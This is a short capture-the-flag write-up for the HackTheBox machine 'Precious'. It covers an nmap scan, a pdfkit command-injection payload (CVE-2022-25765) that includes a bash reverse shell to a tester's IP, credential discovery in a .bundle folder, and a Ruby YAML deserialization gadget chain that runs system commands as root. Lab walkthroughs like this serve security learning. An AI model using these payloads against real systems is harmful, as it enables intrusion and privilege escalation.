3.5 KiB
HackTheBox - Precious
NMAP
Nmap scan report for 10.10.11.189
Host is up (1.5s latency).
Not shown: 63496 closed tcp ports (reset), 2037 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| 256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_ 256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80 (HTTP)
Visting the web server, it redirects to precious.htb
Adding the domain in /etc/hosts
file
It says about entering a url which will convert it into a pdf file, on trying http://localhost
and http://127.0.0.1
it doesn't allow them
Trying a remote url did worked
Foothold
Running exiftool
on the generated pdf, we'll see the version of pdfkit
Which reveals that there exists a CVE-2022-25765
and it's vulnerable to command injection
Following the commits being made on pdfkit and snyk, it needs http://
at the begninig and the with back ticks we can can include shell comamnd
http://%20`ping 10.10.14.72`
http://%20`/bin/bash -c "bash -i >& /dev/tcp/10.10.14.72/4444 0>&1"`
Running pspy doesn't show anything interesting
Privilege Escalation (henry)
Going into ruby
's home directory, we can see .bundle
foldder which has henry
's password
Doing sudo -l
we can see this user can run `/opt/update_dependencies.rb file as root user
Since it's reading yaml, this can absued with yaml deserilization and it's vulnerable because of yaml.load
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id
method_id: :resolve